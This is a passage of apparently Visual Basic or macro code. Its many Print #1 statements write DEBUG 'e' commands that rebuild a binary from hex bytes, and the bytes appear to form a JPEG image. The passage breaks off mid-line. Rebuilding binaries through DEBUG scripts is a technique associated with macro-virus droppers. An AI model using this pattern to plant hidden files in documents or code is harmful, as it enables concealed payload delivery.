Print #1, "e 2FC0 25 8D CA 0C E1 74 46 16 0C 9C A0 AD 0E 52 B2 7A" Print #1, "e 2FD0 B5 1C E3 37 0C A0 DF DC 03 64 65 25 3E 26 5B 02" Print #1, "e 2FE0 B1 71 AE E0 60 04 01 AF BC E1 95 D4 CF 2E 1F 72" Print #1, "e 2FF0 F2 A5 4A 99 99 84 59 8F 1E 81 14 1C B0 C7 51 1D" Print #1, "e 3000 0B A7 06 A3 AB B9 61 B8 75 81 0E A5 8C 34 A0 BE" Print #1, "e 3010 D3 1B 47 97 89 7D 72 30 2E E6 94 88 B4 DF 23 33" Print #1, "e 3020 89 8D 87 23 D4 52 CA 9C 91 F2 B6 FA 3C E4 82 08" Print #1, "e 3030 82 B0 5F 33 81 99 0A 7D 0C 4B 99 CC F1 B1 CC 2E" Print #1, "e 3040 75 72 87 96 09 B3 4E 99 70 1C F9 96 05 92 69 F0" Print #1, "e 3050 BB 59 99 E2 3E 85 F3 8B 2D 0C 1C DF B8 B3 3B 01" Print #1, "e 3060 F7 C7 32 BC B7 74 77 0E 7E 22 E6 12 09 7C F4 14" Print #1, "e 3070 64 F4 53 81 6E 0E CA FC 41 5A B8 8D 96 E3 B1 CD" Print #1, "e 3080 F5 C9 EE 87 E6 60 46 31 9F A6 62 F1 33 5E 74 74" Print #1, "e 3090 80 C0 9C C7 C7 7E F7 12 52 F2 4B 8C 0A 0D 68 0F" Print #1, "e 30A0 A9 D2 55 6C 19 50 29 24 6A B3 9D C0 B6 C1 99 B2" Print #1, "e 30B0 CD 5F 92 10 AE 32 E9 07 AC 10 CA B7 B5 4E D7 97" Print #1, "e 30C0 F0 4D 55 89 CC 47 99 19 A6 56 D4 F2 0E 48 96 92" Print #1, "e 30D0 AE 0B 82 51 0B 19 B9 68 07 93 A2 65 BC 89 47 EF" Print #1, "e 30E0 31 EC FA 7E 48 0B 7B 38 C2 D5 5D 39 B3 AE 51 7A" Print #1, "e 30F0 7E 65 6E 16 C5 1B F4 C4 9A F0 A3 67 A2 ED 4A E6" Print #1, "e 3100 35 81 0B F1 2A 58 43 B0 49 E6 90 AC 44 67 89 BE" Print #1, "e 3110 66 AF EF 0C BE 69 7D D9 C2 3E 53 AD E3 66 88 D1" Print #1, "e 3120 E8 66 2E 68 D3 07 3A FD 22 14 A6 8F D1 E5 2A B0" Print #1, "e 3130 5B C2 D7 DF 99 46 5F E2 8C 95 F9 B4 C0 0A 72 B3" Print #1, "e 3140 C3 2C 58 C5 56 34 F6 4A 65 DC 02 94 13 25 35 71" Print #1, "e 3150 59 7F 42 33 66 48 5E B6 4C AB FF 00 9C 2B FF 00" Print #1, "e 3160 C9 0C 05 49 42 D3 A7 07 98 E6 75 44 0E 87 51 9C" Print #1, "e 3170 23 70 1C EE 14 B7 13 EE 07 72 F1 0C 9A 4B C5 6A" Print #1, "e 3180 22 9B A4 A5 43 7D 7E 90 E2 FA 36 26 6E 87 83 FF" Print #1, "e 3190 00 63 69 AA E5 61 6C 10 E3 28 50 2F 3E F3 C9 98" Print #1, "e 31A0 EE 0D 26 63 12 ED 17 8A 66 EE 88 F0 05 F7 06 C2" Print #1, "e 31B0 6C 09 D8 FE 6A 16 95 3C 31 0C CC B4 7C 8A 1B 63" Print #1, "e 31C0 A3 82 01 F1 2C 72 B7 36 83 CE 60 05 73 D1 28 55" Print #1, "e 31D0 F4 07 10 C0 05 66 A0 9B 8A F0 44 D4 B8 EB 3C 83" Print #1, "e 31E0 BE A1 E6 31 98 5A 9B 9F FC 3F E1 B1 34 90 56 CC" Print #1, "e 31F0 9B 98 E5 27 24 A9 B0 9B 27 E3 04 DA 45 B9 5C 7D" Print #1, "e 3200 C6 BD CE 72 FE 59 9C 17 D5 B2 BA 8D F5 71 B1 E6" Print #1, "e 3210 52 B7 71 20 8C 67 6A 94 E6 34 63 6C D8 FE 20 E8" Print #1, "e 3220 07 3F D3 E0 DF B3 37 1C 52 B4 8D 12 9C 6C 7F 62" Print #1, "e 3230 F3 72 DD D3 5D 2B 3C 1F BC D4 00 D0 10 7E E1 E9" Print #1, "e 3240 D0 3D 1D 81 9F 51 B9 47 4C 0F 28 AD 91 A8 86 6D" Print #1, "e 3250 C8 00 E4 4F 17 10 25 C7 77 D8 F7 50 EC 00 CF 98" Print #1, "e 3260 E0 FA 94 2C 86 48 4B 49 A5 86 62 98 86 E2 51 BE" Print #1, "e 3270 77 F4 6A D3 E8 2E 0C 55 7F B6 68 27 E4 62 1F 88" Print #1, "e 3280 6F 70 5C B0 2B 4C 58 1D 6B D0 47 32 99 37 5D DC" Print #1, "e 3290 4B 58 C4 02 FB 63 6E 2A 5F A0 E5 DB A8 67 68 B4" Print #1, "e 32A0 F5 9E 4E 52 86 68 AA D6 7C 92 9F 1A E2 1F C0 CD" Print #1, "e 32B0 FA FB 2C F9 DC 3D 51 FE DC C0 05 FC 92 C5 F0 23" Print #1, "e 32C0 B5 00 73 2C 7E A9 FF 00 68 96 54 E6 C2 E6 6C 51" Print #1, "e 32D0 7F 84 1F AC 66 3E 35 31 5D 21 1B FA 26 1B 8B 89" Print #1, "e 32E0 46 6D 1F 32 A6 C9 34 D2 8F 68 E2 E9 09 69 18 18" Print #1, "e 32F0 46 27 98 60 E7 FD C8 D5 0D BE D2 AC 9C 49 B7 1B" Print #1, "e 3300 3F B1 2E 37 61 E0 38 73 45 9A F7 F1 1A 9F 13 83" Print #1, "e 3310 F7 B9 9B 98 F0 B7 E2 68 6C 2F 0C A9 8A F9 85 79" Print #1, "e 3320 99 70 1E 37 12 E7 42 B9 6B 4F 4E E7 D2 69 CD 05" Print #1, "e 3330 CA F0 78 97 84 A5 76 C5 C5 2D 7E F8 7F 1A 67 C8" Print #1, "e 3340 BA 86 07 CC B0 EF 2C 72 3D E0 21 E1 D7 32 82 FA" Print #1, "e 3350 D9 8D 0A AE 65 6D 5C C1 EF A7 BB 32 E3 1E 65 FD" Print #1, "e 3360 91 C5 8F 75 5F 3D FC FA 38 86 25 A3 6C 3E A3 2D" Print #1, "e 3370 DF E9 51 E8 98 C7 19 49 CC C7 2B E6 1C D9 D3 66" Print #1, "e 3380 E5 54 48 47 FF 00 13 C4 2A AF 60 06 54 17 5E 70" Print #1, "e 3390 C4 0B EE 7C CC 51 CE 70 FF 00 64 6E 95 C4 13 B5" Print #1, "e 33A0 49 4D 3F A6 E5 C0 BE 22 4E A1 E8 C4 36 7A E9 59" Print #1, "e 33B0 87 0A 7A 94 B0 7A 1B CB 37 00 03 9C 27 30 6E AF" Print #1, "e 33C0 88 D5 CC 82 97 C0 6E 57 E1 38 7C 8B 1C 0E 69 9F" Print #1, "e 33D0 D1 EE 3F 97 52 A2 51 F1 42 A5 B3 97 43 DA 75 A2" Print #1, "e 33E0 50 BB 54 63 A0 3C 4B 5F 07 BA D1 2A 96 81 0E BB" Print #1, "e 33F0 9E F3 6A 3D 2E 75 28 1C 21 C0 22 51 4C 76 BE 57" Print #1, "e 3400 DC E3 E4 47 F8 0E 61 5E 10 FD E9 97 F7 F7 7C 4D" Print #1, "e 3410 DA 0B 65 F1 3A 0E 07 9F 01 FC C6 14 8B 57 31 C4" Print #1, "e 3420 BD 57 A1 18 34 E2 68 E1 D8 99 31 6B 87 EB B4 28" Print #1, "e 3430 E8 E6 0A BA 39 3B 92 C0 FB 4B 3E D2 98 3C C7 F7" Print #1, "e 3440 E3 FB E3 C2 03 5E 51 11 75 72 27 FD 44 B6 1F 08" Print #1, "e 3450 B8 A1 D4 88 10 F4 65 7F C1 5E E0 E8 0C 50 15 D7" Print #1, "e 3460 27 F0 4C 71 E8 A1 DA 67 E9 F0 CF 12 76 CA 6C CA" Print #1, "e 3470 F5 71 15 AF A1 E8 C0 B4 1B 94 C3 22 8A FE 13 43" Print #1, "e 3480 97 54 FA B6 E6 18 95 BF 03 1E 41 6B 2C FD E6 53" Print #1, "e 3490 27 54 C4 B2 44 1F EC 32 FD 57 AC 8B 14 79 80 0A" Print #1, "e 34A0 A8 4A 02 F4 A6 7E 58 9B C1 DD 41 ED 29 46 86 AB" Print #1, "e 34B0 F3 5A 62 38 3F 2A 16 18 FE FE E2 3E 84 B9 36 BF" Print #1, "e 34C0 A9 62 D3 DA BF 72 8B 45 2C 15 7C 9C CB 02 5A 3D" Print #1, "e 34D0 06 CA 63 88 7A B2 EA 62 34 94 AC 5F 06 A2 B8 5F" Print #1, "e 34E0 01 AF D0 6D C5 B7 88 17 0A 60 62 DF 31 FC 45 F6" Print #1, "e 34F0 71 E9 42 9B 78 89 56 B6 BC CF 06 31 CC A8 5B 8C" Print #1, "e 3500 68 21 C1 57 CC 77 01 F6 FD 12 2B AF 5E 3F C2 39" Print #1, "e 3510 8E 38 D7 E8 A4 0C 70 85 D7 A5 E9 C1 87 6C AD EB" Print #1, "e 3520 5E 94 D2 98 D5 CB E8 CD 0C 5A CD 0A 72 E6 73 12" Print #1, "e 3530 DC AC 3E D1 98 C6 40 AF E2 56 8E E7 99 00 DE 8A" Print #1, "e 3540 55 56 F1 2D 17 71 F6 06 61 A1 E5 15 11 C0 8D 7F" Print #1, "e 3550 53 01 14 0A 57 93 3B 75 16 BC 28 75 FC E3 25 63" Print #1, "e 3560 8B B7 EC BF 1F 1E 65 26 80 C6 9F 37 B6 09 D4 1F" Print #1, "e 3570 68 85 47 EC A8 70 E9 C8 8F DD B9 61 C4 F7 E4 7F" Print #1, "e 3580 78 05 F0 A1 FC 3F A1 0E 20 CC 28 BE 3D 13 FE BF" Print #1, "e 3590 43 59 06 33 9D FA 2E 91 70 4A 4C CF B0 E2 22 0E" Print #1, "e 35A0 C8 25 3F CB 3D B1 09 58 1E 7E A2 C5 F8 8A DF D1" Print #1, "e 35B0 92 46 56 1E 0B BF 1A 9F 43 35 25 A3 89 92 E9 FE" Print #1, "e 35C0 5A F2 D4 28 FA 17 BF 1C AB E8 EF 15 D4 61 0A BA" Print #1, "e 35D0 66 EC 7A F4 3F 02 E1 BD BD C5 4C 02 09 46 FF 00" Print #1, "e 35E0 31 CD 2B 97 8E 66 5F 31 81 76 94 DC C8 6C A7 D4" Print #1, "e 35F0 56 33 A3 6C 26 6A F5 02 08 40 A7 FE D2 E4 17 7A" Print #1, "e 3600 13 8A 47 7F 62 5F 17 14 39 6F CD C7 66 07 15 BB" Print #1, "e 3610 FC C6 02 69 AC B0 2B E6 EA 2B 0C 7B 96 B7 D4 88" Print #1, "e 3620 3E 45 53 2A B3 1D 69 10 A6 F7 78 50 ED ED 5F 7F" Print #1, "e 3630 A4 9C 6B 14 B0 D9 11 37 18 61 A2 87 E8 50 BD 4C" Print #1, "e 3640 26 86 D8 30 72 F1 51 4D A7 48 8F 19 88 D0 71 FA" Print #1, "e 3650 5D 6A DF 30 12 C7 DA 34 D3 C9 12 C3 C1 39 26 ED" Print #1, "e 3660 EF FC CA 7B 40 D4 D3 36 85 9D 92 FB 43 CC 94 03" Print #1, "e 3670 72 E5 3E 83 5A F5 67 91 61 58 D5 51 6B 1B 9A 3D" Print #1, "e 3680 00 56 88 C0 EB 90 E7 C2 66 34 33 91 59 F6 C3 85" Print #1, "e 3690 66 E4 C3 6C 1D 09 53 83 F1 34 00 D3 0F E9 2E 90" Print #1, "e 36A0 4E 70 77 A0 99 DE D8 35 F2 B0 AC F6 CE B0 F3 2F" Print #1, "e 36B0 6E FC A7 33 28 A6 5A FD 83 29 49 84 6B F3 1C 5B" Print #1, "e 36C0 7A 86 FF 00 92 C4 05 DD CA F4 A2 BC CE 13 3C BA" Print #1, "e 36D0 9E 4D 8B 14 72 10 69 1B 3D 08 C7 2D DB FA 68 03" Print #1, "e 36E0 1C B3 31 2E 2A 51 BD 19 98 C4 B3 C7 E9 5F 2D 85" Print #1, "e 36F0 6E 34 AF AF 31 09 57 C4 F3 2C 6C B0 7A 01 79 B8" Print #1, "e 3700 BD 13 DC 8D 6B 54 82 2A 08 F9 FF 00 13 BD 5C B5" Print #1, "e 3710 6C 58 2D 3E E6 98 7E 5F D9 50 B3 3E CC CF CC E8" Print #1, "e 3720 A0 5F 3F A5 1C 41 8B 79 41 9B DF 27 33 34 7A 59" Print #1, "e 3730 4E 37 B9 43 B6 AC A9 3D A1 10 0D 05 5F 71 EA AB" Print #1, "e 3740 A7 31 05 EB 28 D1 EF C4 6C 87 83 2B CB B6 54 5C" Print #1, "e 3750 00 4D E1 97 1F 79 C9 D7 05 89 F1 23 4A 88 3A 43" Print #1, "e 3760 79 EF 05 31 C3 9E AA 6B 09 19 72 9C 8C C2 F8 E7" Print #1, "e 3770 11 05 05 27 71 B2 C3 79 AA 2E 52 F3 9A FD E3 B7" Print #1, "e 3780 A3 1B 27 48 71 4F DD 5F AA 2A 08 F9 95 E8 B0 8E" Print #1, "e 3790 47 03 66 39 6A 2B 8D 96 21 70 B0 AF 2F E9 F7 B7" Print #1, "e 37A0 2E 0D C7 EA 23 C9 EF 16 9F D8 FF 00 51 F2 1F 06" Print #1, "e 37B0 51 08 87 D1 1C 91 D7 2E A0 C8 AB 49 9A ED FE 3B" Print #1, "e 37C0 49 7E E2 DF D4 B7 1B E7 C1 69 F1 68 E0 88 80 AD" Print #1, "e 37D0 3A F3 DB 37 21 37 39 E8 39 87 F9 4E D8 F5 68 84" Print #1, "e 37E0 EA B6 D0 2D 80 00 4C E9 A5 C4 26 2B 47 7C 62 05" Print #1, "e 37F0 71 9A C0 E7 9E D1 6A E5 08 2E 60 8A 4B 0D 3F B8" Print #1, "e 3800 13 38 44 A5 85 EE E6 FC 0C 9D F9 96 6A 72 8E 25" Print #1, "e 3810 D6 96 0E 63 F6 ED 6D 2B FF 00 57 CC 21 8A 86 84" Print #1, "e 3820 8D 00 6E 3C 7D E3 B7 F5 50 15 14 5E C8 7F C0 80" Print #1, "e 3830 9F 3C B1 5F 89 AF 60 E0 31 19 C6 22 56 9F AC 16" Print #1, "e 3840 CA 70 87 63 E6 FE C8 F6 1F 2F EC 26 9C BB C3 F7" Print #1, "e 3850 8F 58 7D EB FB 94 2B 34 1E E1 0D 89 7A 5F C4 A1" Print #1, "e 3860 9B 86 3C AE B8 86 39 2F 88 6C 35 E4 99 32 F8 42" Print #1, "e 3870 DF D8 7E 90 5D 17 2E C0 77 79 AB 7F 38 CD 31 E4" Print #1, "e 3880 96 05 51 E5 BF D2 4B 65 DF 0B 83 3A 47 77 0E A8" Print #1, "e 3890 79 DD 45 A0 2B F1 72 C5 D0 07 C0 96 0B 8A CC 62" Print #1, "e 38A0 29 C3 F7 44 AB 39 33 14 43 12 C1 87 1A 97 A5 E9" Print #1, "e 38B0 66 26 D8 6E 6C BC FF 00 11 8E 6C 03 1C 15 12 6F" Print #1, "e 38C0 CE 59 10 A4 54 5A 14 22 6A 0E 54 AB 04 F5 BF E6" Print #1, "e 38D0 77 18 40 68 67 13 10 73 AD F3 58 F4 00 10 34 D1" Print #1, "e 38E0 40 ED BF A9 B3 F4 11 03 82 20 E0 BE 3F B9 72 EF" Print #1, "e 38F0 0F 0F B3 FE 45 35 1F B2 56 C2 DB 4B 65 8A 1F A8" Print #1, "e 3900 82 62 F6 9C 9B 96 E6 C5 CB AB C9 CF 88 4A E4 83" Print #1, "e 3910 66 CF 24 42 AE 79 A3 CB AE BC 3E 20 AA 8D 71 66" Print #1, "e 3920 72 D5 F1 AC 31 24 6C 16 FE 61 2B 3D C8 FE E5 35" Print #1, "e 3930 13 E5 29 29 78 B2 56 D6 FC AE 7C 8B 2A 1A 61 85" Print #1, "e 3940 76 03 DA 02 68 78 63 19 1E 23 9F ED 16 5B 69 F6" Print #1, "e 3950 98 A6 87 B9 29 FF 00 A7 F3 E8 C1 ED C2 73 1C 58" Print #1, "e 3960 8E DD FF 00 C4 03 67 FC 12 C7 E3 7B 4F EC 0B 2F" Print #1, "e 3970 6B DA 71 E4 96 94 1D 3A 83 D8 74 3F F7 71 8C C8" Print #1, "e 3980 5C 58 B9 4D 72 2C 88 18 B3 6D AE 25 46 79 98 A7" Print #1, "e 3990 BA 7E FB F8 85 8E 03 2E FC 43 88 DA DA 81 88 28" Print #1, "e 39A0 5A 41 A8 FD 85 64 F9 80 4B B0 05 B3 58 EB 27 1A" Print #1, "e 39B0 EF 98 29 98 3E 03 FE E0 81 6E E7 12 DC 52 5E 2C" Print #1, "e 39C0 5E BD A6 BB EE 3B 7D 6A E5 8D 8F B4 62 EA 8C D0" Print #1, "e 39D0 73 64 22 96 AF E4 81 11 FF 00 D2 AD C4 46 92 9F" Print #1, "e 39E0 F0 D8 C0 BC D3 04 27 02 28 60 0A AC CC 38 52 CE" Print #1, "e 39F0 4A E0 EA 6D 34 B6 71 9D 44 B5 90 66 95 71 8E E1" Print #1, "e 3A00 EF 71 D1 32 A3 E8 82 2A 72 8E 65 50 FC 72 D8 15" Print #1, "e 3A10 EB 53 F7 36 A9 60 87 24 DD B4 4D 0C F7 71 32 2E" Print #1, "e 3A20 3A 4A 8F F1 E6 5D 90 72 27 89 1F 43 1C 5C 77 B3" Print #1, "e 3A30 B6 7E 01 64 B8 56 96 E5 11 B5 94 F1 49 D2 D1 00" Print #1, "e 3A40 D4 6C FC 4A AB 5C 0C 89 84 13 4E 8F B9 7E 30 41" Print #1, "e 3A50 79 25 D0 15 B1 23 CD A7 A1 1F BC FC D1 87 EE 52" Print #1, "e 3A60 F5 1D 0C C0 7A DE A6 14 DC C7 0F CA 4C 25 B4 C5" Print #1, "e 3A70 7E E1 B8 CB 0B E9 2B 29 07 43 A8 F1 C3 CC DF E1" Print #1, "e 3A80 D4 78 E1 78 B9 7F 91 5B 0F E9 BB 9F 82 48 39 D9" Print #1, "e 3A90 61 B8 BD AB 71 27 32 89 52 B1 8B 28 60 D9 11 78" Print #1, "e 3AA0 94 47 4F 12 AD 24 70 08 76 29 FB 8B CF 98 B7 EA" Print #1, "e 3AB0 CA 55 6A B9 5C 1D 9D 3E A1 10 43 C4 CD 38 8E 98" Print #1, "e 3AC0 7A C7 28 56 5A 38 9A C1 E0 20 58 53 62 BE 66 29" Print #1, "e 3AD0 50 E4 5B 9B 5B 1E 60 C4 E6 51 22 53 AF 12 AA 46" Print #1, "e 3AE0 F0 5E 20 AA 3D C5 86 98 A7 C4 B6 ED B8 22 CC AC" Print #1, "e 3AF0 10 F2 DC 58 81 7C A1 5F EE 10 8F 65 BC C4 19 52" Print #1, "e 3B00 0B 40 F9 46 F8 8A DA 3D B3 FF DA 00 0C 03 01 00" Print #1, "e 3B10 02 00 03 00 00 00 10 18 2D C0 C9 3B 7D D7 49 76" Print #1, "e 3B20 A0 3F B5 C5 56 07 0C 3E 7D 08 08 86 67 9C EB B1" Print #1, "e 3B30 51 C1 CE B3 9C 87 EC C6 DE A8 68 C1 EA 6E 19 7B" Print #1, "e 3B40 38 57 88 1C 85 71 A2 BD FD DF B0 0D 4F BC 2F 0B" Print #1, "e 3B50 13 D0 99 B9 42 AC 0F D1 EF 8F 06 86 54 F1 6A FA" Print #1, "e 3B60 8C 9E 8F F9 3C 84 EF BD 8D 52 A7 7D 04 A6 2D 7C" Print #1, "e 3B70 46 ED D5 5D C0 B0 44 FC F0 B0 B0 EE B3 89 A3 2C" Print #1, "e 3B80 96 A2 3D 8C 87 C9 BF 52 C0 D1 A5 53 0F E1 99 C8" Print #1, "e 3B90 A9 2E 75 83 08 32 EF 80 EE 6E CA 8E 85 4D E7 2D" Print #1, "e 3BA0 DD 6E 18 BB 21 78 49 3B BF 69 FF 00 0A 6B 6C 5A" Print #1, "e 3BB0 89 9B 6B 92 AA C0 AE FD 87 70 E7 CB 76 88 0C 82" Print #1, "e 3BC0 B5 EE C3 E9 60 F6 01 0F 49 3C 05 E9 19 A2 06 D6" Print #1, "e 3BD0 FE 28 F0 4C C3 A7 B1 B5 0F D9 80 70 B9 E9 91 92" Print #1, "e 3BE0 81 90 45 27 83 40 54 F8 2F 39 92 A0 28 A9 23 0F" Print #1, "e 3BF0 95 A5 CC CF AD FC 75 F0 FF 00 DD 3F 50 A9 07 27" Print #1, "e 3C00 FB D3 14 A9 2F BC F3 E7 5D 14 ED 3C AA 28 8F 34" Print #1, "e 3C10 90 74 60 5D 60 B8 98 26 ED 28 95 95 74 DC 49 34" Print #1, "e 3C20 38 46 C3 EB DF 0D 3D 41 33 AF 1A 1D DD 7F E4 D4" Print #1, "e 3C30 FE DA 88 B7 4B 4F 7F 2E A9 90 4E 8D B0 3E 25 79" Print #1, "e 3C40 B9 B1 18 03 1E 73 B6 0F DD 93 92 10 76 95 B2 20" Print #1, "e 3C50 C7 6C 59 2B 12 EF 8F 49 F0 B2 27 06 B3 FF C4 00" Print #1, "e 3C60 26 11 01 01 01 00 03 00 02 02 01 03 05 00 00 00" Print #1, "e 3C70 00 00 01 00 11 10 21 31 41 51 20 61 71 81 91 A1" Print #1, "e 3C80 B1 C1 E1 F0 F1 FF DA 00 08 01 03 01 01 3F 10 1B" Print #1, "e 3C90 4B 6E 74 CF A3 29 F1 94 18 31 0F BD D5 B9 DD BE" Print #1, "e 3CA0 FA 49 DB 6C F7 F8 D4 66 C5 8B 36 0B 16 39 AC D8" Print #1, "e 3CB0 B0 CA 58 81 65 81 C7 CF 1B 24 06 43 58 0F 98 FA" Print #1, "e 3CC0 5F 05 D8 EE 6E CF 03 E0 B3 65 7B D9 63 78 44 3F" Print #1, "e 3CD0 96 FD D3 F7 48 71 2D BE 4B 7F 56 A0 96 F6 13 E4" Print #1, "e 3CE0 FD 52 8F 78 DC 96 F7 C3 31 86 4E 20 07 D8 8E A0" Print #1, "e 3CF0 96 07 49 68 30 1E B1 4D 08 8A 67 5C 0D 64 47 5C" Print #1, "e 3D00 92 93 3A D4 31 98 FC 74 2E 92 07 BB 30 E5 97 56" Print #1, "e 3D10 2F 65 F5 71 B5 63 78 E1 A7 70 2D 5B 1D 48 66 B1" Print #1, "e 3D20 81 F3 BF F7 F9 BB E1 C8 6B 16 68 7E D6 83 0D 71" Print #1, "e 3D30 72 DD 3B 6F A2 6C 6F 91 8D 9F B6 F1 98 0F 63 6F" Print #1, "e 3D40 6C E7 53 2E BC BA 39 6F E5 DA 2F 88 9B E8 9F 32" Print #1, "e 3D50 5F CB C3 EA C0 0B 62 39 FE AE 33 74 9A F9 E5 A8" Print #1, "e 3D60 75 76 F5 A2 F8 1C 7F 58 57 A8 F6 8A F5 2D CF E2" Print #1, "e 3D70 3D C8 F2 3A 62 CF 4F 77 AD 79 97 FB 16 01 4D 36" Print #1, "e 3D80 2D D8 17 7D 9E E2 20 DB C6 06 58 1A EC E2 1B 35" Print #1, "e 3D90 B2 75 6F 5D FE 67 BC 77 39 CB B3 F5 C2 07 F9 59" Print #1, "e 3DA0 02 78 02 32 47 AB 08 F5 33 ED 96 1F 57 CC 10 CC" Print #1, "e 3DB0 09 3D 6C AF D6 00 9F 9D 8F C6 EC D2 68 AC D5 47" Print #1, "e 3DC0 EF 3F 36 37 E2 CB C5 0A F6 F1 27 76 ED CB 7D 86" Print #1, "e 3DD0 D7 A7 DB D8 DE 0C FF 00 3F F1 18 B7 AC 2C 37 08" Print #1, "e 3DE0 E0 13 06 7B 61 98 32 63 EA 4A E5 A3 AD CD F8 B0" Print #1, "e 3DF0 EC 9C 63 08 F5 CC 26 DB F1 08 87 98 C9 36 13 C9" Print #1, "e 3E00 F4 65 3D 9F AC 04 76 DE 3A E3 21 87 69 6B EE ED" Print #1, "e 3E10 EB 00 4E 22 36 F0 E2 75 6B C6 2C 1E 5B 91 DF C4" Print #1, "e 3E20 E1 DF 80 7F 6F FD 90 9D 49 AF 4E 36 9F 4B B7 BF" Print #1, "e 3E30 83 6E 7B 7B C6 7D 70 0D 32 F8 BE 6B 3E D8 E3 38" Print #1, "e 3E40 DE 30 75 6E 1B AC B6 DA F7 78 D4 61 93 D4 22 7A" Print #1, "e 3E50 61 3D FB 77 E3 C9 5E 7C 4E FD 2D 9E 77 60 DE 06" Print #1, "e 3E60 4C 83 5C 38 CF AB 6E 82 4B DC 3F 5C 3E 4C 5B F9" Print #1, "e 3E70 96 F7 F9 32 D2 53 CF B1 D7 7E CB 26 FC F3 D8 5A" Print #1, "e 3E80 F6 DE 49 49 42 56 E1 6C 7E 48 D7 CB BF 9B 27 6E" Print #1, "e 3E90 1E FD 5E 32 39 50 F6 EE EA 08 F3 FC A8 5E A5 E1" Print #1, "e 3EA0 C6 7E 42 3A 6C DA 37 91 81 A1 F5 8C EF D9 0B 3B" Print #1, "e 3EB0 B0 CD 95 1B F3 78 61 1A EE 72 58 E1 CE 47 D5 E9" Print #1, "e 3EC0 D5 8F 5E EC 0F C3 B9 60 85 EA B1 23 36 D9 7E EC" Print #1, "e 3ED0 46 78 87 F8 87 F2 DF B6 FD 5B F6 92 1F 1C 67 CC" Print #1, "e 3EE0 0B B5 D9 8E 2C 17 4B D5 D8 6A D1 3B 99 88 F8 4E" Print #1, "e 3EF0 3A E5 07 B6 06 33 B3 F7 79 59 65 9B 75 EC EA E9" Print #1, "e 3F00 EF 70 EF 3E 44 47 20 DB B8 38 77 9C C2 60 7A B4" Print #1, "e 3F10 31 62 33 8F 55 32 36 E4 42 FF 00 FF C4 00 23 11" Print #1, "e 3F20 01 01 01 00 02 02 02 02 02 03 00 00 00 00 00 00" Print #1, "e 3F30 01 00 11 21 31 10 41 51 61 20 71 91 A1 C1 D1 F0" Print #1, "e 3F40 FF DA 00 08 01 02 01 01 3F 10 FA 21 6F 30 ED E9" Print #1, "e 3F50 05 02 DD 22 76 B0 B0 B2 1B F1 40 2B 76 ED 5A B7" Print #1, "e 3F60 6F CD 7D 57 D1 7D 11 1A 84 CF DE 52 4C 82 16 06" Print #1, "e 3F70 D8 AE B3 93 BE A6 C0 E6 C9 D5 D1 D8 71 CF 1D 3C" Print #1, "e 3F80 F6 12 7D 5A F8 81 EE 1A D2 03 69 62 C5 8B 4F 3B" Print #1, "e 3F90 24 EE C4 17 AB 60 4E 62 01 19 2B 98 63 76 7F D2" Print #1, "e 3FA0 34 75 35 92 D8 B0 10 CC 9D F5 73 6C 9D B9 B7 0D" Print #1, "e 3FB0 B4 A1 9E 0F A4 83 8C F4 BA 4D 93 3E 4C 7B 32 5B" Print #1, "e 3FC0 DD A4 8B D3 23 C5 B0 0D 2E E7 83 0E 65 9C 17 27" Print #1, "e 3FD0 36 BB A1 96 9D B2 6A 6B 65 C8 1A 17 DA 07 8A 7D" Print #1, "e 3FE0 C8 CE 24 52 FA A4 FD 43 E1 71 75 2C EC B0 43 8B" Print #1, "e 3FF0 3C 3E 32 0F 02 57 6D D5 40 5C 3D 58 34 59 B5 6B" Print #1, "e 4000 CB C7 1E 5B 10 1B CC E8 E1 E6 3E 32 83 98 DF 08" Print #1, "e 4010 78 0D F6 B2 CF 72 33 7A 89 0E EC 60 B4 1F A9 01" Print #1, "e 4020 74 F3 89 A7 0E BC A4 96 78 3E EC F8 75 24 47 96" Print #1, "e 4030 33 82 79 04 99 87 13 8E 31 09 C1 91 73 74 B4 36" Print #1, "e 4040 7A 5D A5 87 82 0D B8 78 DC F3 D7 0F 53 3C 97 16" Print #1, "e 4050 31 1F 24 83 0B BB 2C DB 2F A9 8C 6C D9 83 3C 67" Print #1, "e 4060 C9 2B D2 02 6E CB A5 CB B3 38 CA 3B 7E D7 56 5D" Print #1, "e 4070 0B 47 2F 10 24 78 ED DC E0 64 4F C9 0E F3 2E B8" Print #1, "e 4080 9C 47 10 D9 2F AC 63 C7 34 D9 07 A8 F7 8F 50 EF" Print #1, "e 4090 84 67 E3 83 2D 70 6C 3E 21 CE 8B 96 E4 12 3E 3C" Print #1, "e 40A0 1A 70 DF 2F 1A C8 0F A8 3E 0E BF F7 F5 70 6D E2" Print #1, "e 40B0 D8 C3 76 DD B5 F7 6D 87 0F 56 39 A9 16 3E 0A 5A" Print #1, "e 40C0 CD C8 ED 36 DC 96 F4 4F E0 0F 00 F7 62 4F 76 24" Print #1, "e 40D0 6F 11 61 21 78 B2 43 21 BB 7A 91 C1 DC 23 07 37" Print #1, "e 40E0 CA CC B2 18 F8 1D 93 2D 90 E4 80 25 6E 41 30 40" Print #1, "e 40F0 3C 0E FC 3F 53 C7 E4 9A 5C C5 D3 8B 11 9E BC 6B" Print #1, "e 4100 3D 1C 1A 0C B6 62 72 C9 B9 B6 09 DA C6 03 39 FF" Print #1, "e 4110 00 71 CD 4D 84 D5 90 0D 1B 80 C4 80 D7 A8 26 08" Print #1, "e 4120 C3 A7 33 E3 19 9C 82 75 EE 76 3D F9 0D BA 92 20" Print #1, "e 4130 27 F1 F5 1C 95 D9 43 19 E4 63 B7 C3 DC 33 E5 B1" Print #1, "e 4140 37 9D 8E 85 EE 30 7C 3F CB 00 45 D7 4C 2A B0 81" Print #1, "e 4150 81 FD DA 83 C4 69 38 8F 04 6C 1B CD 91 80 2E C9" Print #1, "e 4160 97 C8 71 0B D3 2E D2 DC 85 72 C7 3E A1 27 EE 4F" Print #1, "e 4170 A2 E6 EA 3E 67 88 7F 77 DB 77 08 5B 8E 61 7D 09" Print #1, "e 4180 8F AE 5C 82 48 CE BA 93 74 C9 09 39 7F 17 24 13" Print #1, "e 4190 C6 3C 25 40 1B 20 8D 87 16 0D 9E E3 3F 73 BD 79" Print #1, "e 41A0 2E F2 BF 0B 88 87 C0 87 65 0E E7 3D 17 2F 05 CE" Print #1, "e 41B0 5E D0 F3 19 67 93 FF C4 00 28 10 01 00 02 02 01" Print #1, "e 41C0 04 02 03 00 03 01 01 01 00 00 00 01 00 11 21 31" Print #1, "e 41D0 41 51 61 71 81 91 A1 10 B1 C1 20 D1 F0 E1 F1 30" Print #1, "e 41E0 FF DA 00 08 01 01 00 01 3F 10 43 A0 89 DD 32 2D" Print #1, "e 41F0 5C 17 50 87 0D 30 FC 30 A8 C5 E8 E0 89 88 5D 80" Print #1, "e 4200 